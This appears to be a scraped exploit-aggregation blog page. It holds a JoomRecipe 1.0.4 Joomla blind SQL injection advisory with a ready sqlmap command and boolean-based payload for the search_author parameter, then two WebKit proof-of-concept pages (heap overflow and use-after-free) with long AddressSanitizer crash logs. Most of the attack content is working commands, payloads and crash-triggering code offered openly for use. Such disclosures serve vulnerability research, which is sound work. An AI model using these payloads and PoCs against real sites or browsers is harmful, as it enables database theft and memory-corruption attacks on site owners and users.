# Exploit Title: Joomla JoomRecipe 1.0.4 Component - Blind SQL Injection Vulnerability
# Date: 20.07.2017
# Exploit Author: Teng
# Vendor Homepage: http://joomboost.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/food-a-beverage/joomrecipe/
# Version: 1.0.4
# Platform: PHP
1. Description
Blind SQL Injection on Search page, with "search_author" parameter (POST)
2. Proof of concept
sqlmap.py -u "http://localhost/[PATH]/search/results.html" -p search_author --data "searchPerformed=1&task=search&searchword=asd&searchCategories%5B%5D=*&search_cuisine=&searchSeasons=&search_author=1&search_max_prep_hours=2&search_max_prep_minutes=0&search_max_cook_hours=2&search_max_cook_minutes=0&search_min_rate=0&search_max_cost=999¤tIngredient=" --random-agent --dbs
Parameter: search_author (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: searchPerformed=1&task=search&searchword=asd&searchCategories[]=*&search_cuisine=&searchSeasons=&search_author=(SELECT (CASE WHEN (8160=8160) THEN 8160 ELSE 8160*(SELECT 8160 FROM INFORMATION_SCHEMA.PLUGINS) END))&search_max_prep_hours=2&search_max_prep_minutes=0&search_max_cook_hours=2&search_max_cook_minutes=0&search_min_rate=0&search_max_cost=999¤tIngredient=
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863536720
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1250
There is a heap buffer overflow in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.
PoC:
=================================================================
-->
<script>
function go() {
i.value = "1";
i.type = "search";
f.submit();
}
</script>
<body onload=go()>
<form id="f">
<input id="i" results="1">
<!--
=================================================================
ASan log:
=================================================================
==805==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61200006a660 at pc 0x000116496d47 bp 0x7fff5597b2a0 sp 0x7fff5597b298
READ of size 8 at 0x61200006a660 thread T0
==805==WARNING: invalid path to external symbolizer!
==805==WARNING: Failed to use and restart external symbolizer!
#0 0x116496d46 in WTF::VectorBufferBase<WebCore::RecentSearch>::buffer() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2694d46)
#1 0x116496bed in WTF::Vector<WebCore::RecentSearch, 0ul, WTF::CrashOnOverflow, 16ul>::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2694bed)
#2 0x116493b4b in unsigned int WTF::Vector<WebCore::RecentSearch, 0ul, WTF::CrashOnOverflow, 16ul>::removeAllMatching<WebCore::RenderSearchField::addSearchResult()::$_0>(WebCore::RenderSearchField::addSearchResult()::$_0 const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2691b4b)
#3 0x116493860 in WebCore::RenderSearchField::addSearchResult() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2691860)
#4 0x114905297 in WebCore::FormSubmission::create(WebCore::HTMLFormElement&, WebCore::FormSubmission::Attributes const&, WebCore::Event*, WebCore::LockHistory, WebCore::FormSubmissionTrigger) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb03297)
#5 0x114b3aaab in WebCore::HTMLFormElement::submit(WebCore::Event*, bool, bool, WebCore::FormSubmissionTrigger) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd38aab)
#6 0x1154cd5a0 in WebCore::jsHTMLFormElementPrototypeFunctionSubmitCaller(JSC::ExecState*, WebCore::JSHTMLFormElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16cb5a0)
#7 0x1154c99a8 in long long WebCore::BindingCaller<WebCore::JSHTMLFormElement>::callOperation<&(WebCore::jsHTMLFormElementPrototypeFunctionSubmitCaller(JSC::ExecState*, WebCore::JSHTMLFormElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16c79a8)
#8 0x58d153801027 (<unknown module>)
#9 0x11fd2434a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
#10 0x11fd2434a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
#11 0x11fd1d91a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)
#12 0x11f982757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)
#13 0x11f9043da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)
#14 0x11ef3c0f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)
#15 0x11ef3c362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)
#16 0x11ef3c6d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)
#17 0x114ff5a15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)
#18 0x115389510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510)
#19 0x11478a68e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98868e)
#20 0x11478a170 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x988170)
#21 0x114665041 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x863041)
#22 0x114674aaf in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x872aaf)
#23 0x1145767af in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7747af)
#24 0x114571103 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f103)
#25 0x1149169ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)
#26 0x114913d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)
#27 0x11458f493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)
#28 0x114b035c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)
#29 0x11462e093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)
#30 0x1145ed386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)
#31 0x11407c997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)
#32 0x1140762aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)
#33 0x1169fdc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)
#34 0x10ad232eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)
#35 0x10ad26689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)
#36 0x10ad25ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)
#37 0x10a5c6683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)
#38 0x10a3703b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)
#39 0x10a379888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)
#40 0x1203b0312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)
#41 0x1203b0d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)
#42 0x7fff8da4f3c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)
#43 0x7fff8da302cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)
#44 0x7fff8da2f7c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)
#45 0x7fff8da2f1c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)
#46 0x7fff8cf90ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
#47 0x7fff8cf90cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
#48 0x7fff8cf90b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
#49 0x7fff8b52be23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)
#50 0x7fff8bca785d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)
#51 0x7fff8b5207aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)
#52 0x7fff8b4eb1dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)
#53 0x7fffa33eb8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
#54 0x7fffa33ea2e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)
#55 0x10a28156c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)
#56 0x7fffa3192234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)
0x61200006a660 is located 24 bytes to the right of 264-byte region [0x61200006a540,0x61200006a648)
allocated by thread T0 here:
#0 0x10d26dd2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)
#1 0x7fffa3314281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)
#2 0x120401ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)
#3 0x1203f6c4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)
#4 0x12038c437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)
#5 0x12038b768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)
#6 0x11400c548 in WebCore::RenderObject::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20a548)
#7 0x116bd7dbd in WebCore::RenderPtr<WebCore::RenderTextControlSingleLine> WebCore::createRenderer<WebCore::RenderTextControlSingleLine, WebCore::HTMLInputElement&, WebCore::RenderStyle>(WebCore::HTMLInputElement&&&, WebCore::RenderStyle&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dd5dbd)
#8 0x116bd7d30 in WebCore::TextFieldInputType::createInputRenderer(WebCore::RenderStyle&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dd5d30)
#9 0x114b57c46 in WebCore::HTMLInputElement::createElementRenderer(WebCore::RenderStyle&&, WebCore::RenderTreePosition const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd55c46)
#10 0x1165cd605 in WebCore::RenderTreeUpdater::createRenderer(WebCore::Element&, WebCore::RenderStyle&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cb605)
#11 0x1165cc2f7 in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca2f7)
#12 0x1165cbc4d in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9c4d)
#13 0x1165cb47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)
#14 0x1145707e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)
#15 0x11458f478 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d478)
#16 0x114b035c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)
#17 0x11462e093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)
#18 0x1145ed386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)
#19 0x11407c997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)
#20 0x1140762aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)
#21 0x1169fdc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)
#22 0x10ad232eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)
#23 0x10ad26689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)
#24 0x10ad25ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)
#25 0x10a5c6683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)
#26 0x10a3703b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)
#27 0x10a379888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)
#28 0x1203b0312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)
#29 0x1203b0d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2694d46) in WTF::VectorBufferBase<WebCore::RecentSearch>::buffer()
Shadow bytes around the buggy address:
0x1c240000d470: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x1c240000d480: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c240000d490: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
0x1c240000d4a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c240000d4b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1c240000d4c0: 00 00 00 00 00 00 00 00 00 fa fa fa[fa]fa fa fa
0x1c240000d4d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c240000d4e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1c240000d4f0: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa
0x1c240000d500: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c240000d510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==805==ABORTING
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1244
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.
PoC:
=================================================================
-->
<script>
var runcount = 0;
function go() {
runcount++; if(runcount > 2) { return; }
i.type = "foo";
i.select();
i.type = "search";
document.onsearch = document.body.onload;
document.execCommand("insertHTML", false, "");
}
</script>
<body onload=go()>
<input id="i" type="checkbox" incremental="incremental">
<!--
=================================================================
ASan log:
=================================================================
==29786==ERROR: AddressSanitizer: heap-use-after-free on address 0x6110000e2a88 at pc 0x000113b182db bp 0x7fff5a00de60 sp 0x7fff5a00de58
READ of size 8 at 0x6110000e2a88 thread T0
==29786==WARNING: invalid path to external symbolizer!
==29786==WARNING: Failed to use and restart external symbolizer!
#0 0x113b182da in WebCore::InputType::element() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20a2da)
#1 0x1166e662e in WebCore::TextFieldInputType::didSetValueByUserEdit() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dd862e)
#2 0x1166e6513 in WebCore::TextFieldInputType::subtreeHasChanged() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dd8513)
#3 0x114661933 in WebCore::HTMLInputElement::subtreeHasChanged() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd53933)
#4 0x1141e9756 in WebCore::notifyTextFromControls(WebCore::Element*, WebCore::Element*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8db756)
#5 0x1141e8ea8 in WebCore::Editor::appliedEditing(WTF::PassRefPtr<WebCore::CompositeEditCommand>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8daea8)
#6 0x113c8bb78 in WebCore::CompositeEditCommand::didApplyCommand() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37db78)
#7 0x113c8b4eb in WebCore::CompositeEditCommand::apply() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x37d4eb)
#8 0x11421327d in WebCore::executeInsertFragment(WebCore::Frame&, WTF::PassRefPtr<WebCore::DocumentFragment>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x90527d)
#9 0x11420cf05 in WebCore::executeInsertHTML(WebCore::Frame&, WebCore::Event*, WebCore::EditorCommandSource, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8fef05)
#10 0x114209f93 in WebCore::Editor::Command::execute(WTF::String const&, WebCore::Event*) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8fbf93)
#11 0x1140964fa in WebCore::Document::execCommand(WTF::String const&, bool, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7884fa)
#12 0x114c443e5 in WebCore::jsDocumentPrototypeFunctionExecCommandCaller(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13363e5)
#13 0x114c2add8 in long long WebCore::BindingCaller<WebCore::JSDocument>::callOperation<&(WebCore::jsDocumentPrototypeFunctionExecCommandCaller(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x131cdd8)
#14 0x114c2ac41 in WebCore::jsDocumentPrototypeFunctionExecCommand(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x131cc41)
#15 0x5b96c2401027 (<unknown module>)
#16 0x10d35034a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
#17 0x10d35034a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
#18 0x10d34991a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)
#19 0x10cfae757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)
#20 0x10cf303da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)
#21 0x10c5680f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)
#22 0x10c568362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)
#23 0x10c5686d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)
